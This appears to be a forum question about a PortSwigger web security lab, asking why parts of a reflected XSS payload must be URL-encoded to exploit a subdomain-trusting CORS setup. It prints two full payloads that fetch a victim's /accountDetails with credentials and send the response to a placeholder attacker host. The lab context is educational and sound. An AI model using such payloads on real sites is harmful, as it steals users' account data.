# Need for URL encoding in XSS / CORS lab

Tags: xss, javascript, html, reflected-xss

I am doing one of Portswigger's labs on web security, specifically CORS (cross origin resource sharing). I am having trouble understanding why there is a need for URL encoding certain parts of the XSS payload.

As a brief summary, the lab involves the following actions:
We want access to information that is delivered to a client on a domain via /accountDetails endpoint. On a subdomain (prefix 'stock.'; in terms of CORS, the website trusts all subdomains) the website is also vulnerable to reflected XSS, specifically a 'productId' query parameter.
The plan now is to host a script on a site controlled by me that (when delivered to a victim) makes the victim send a request to the 'stock.' subdomain with a prepared URL containing an XSS payload in the 'productID' query. From here on, the XSS payload makes the client request the /accountDetails endpoint information which the XSS is able to read since the CORS configuration specifically trusts all subdomains. Then the script returns this information to me by sending a request to my website with the information appended.

Now, my question is not about CORS, but about the XSS part.

The script I host on my website looks like this (I put in linebreaks for better readability; the script hosted on the website does not have linebreaks):

```
<script>
document.location="stock.vulnerableWebsite.net/?productId=
  <script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','vulnerableWebsite.net/accountDetails',true);
    req.withCredentials = true;req.send();
    function reqListener() {location='hackerControlledWebsite.net/log?key='+this.responseText;}; 
   </script>"
</script>
```

Now, this does not work unfortunately. What does work however is the following:

```
<script>
document.location="stock.vulnerableWebsite.net/?productId=
  <script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','vulnerableWebsite.net/accountDetails',true);
    req.withCredentials = true;req.send();
    function reqListener() {location='hackerControlledWebsite.net/log?key='%2bthis.responseText;}; 
   %3c/script%3e"
</script>
```

Notice that the only difference between the 2 solutions is that I url-encode (1) the '+' sign on the third last line and (2) the '<' and '>' sign (in fact, only one of the 2 needs to be url encoded for the solution to work) on the second last line.

Now, my question is: Why do these signs need to be url encoded?
I am guessing that the plus sign needs to be url encoded because 'the plus sign is used as shorthand for a space in query parameters' and since in this case, my script is making the victim request a url and the plus is put inside that url, it is being interpreted wrongly. Is this assumption correct?
And then for the second part (the '<' and '>'), I am really unsure why these have to be url encoded? Is it because I have a script tag inside a script tag? I tried an img tag with an onerror attribute inside a script tag and there I did not have to url-encode the closing img tag... However, the inner script tag is inside a string, so I am wondering why it messes this up?

Thanks in advance!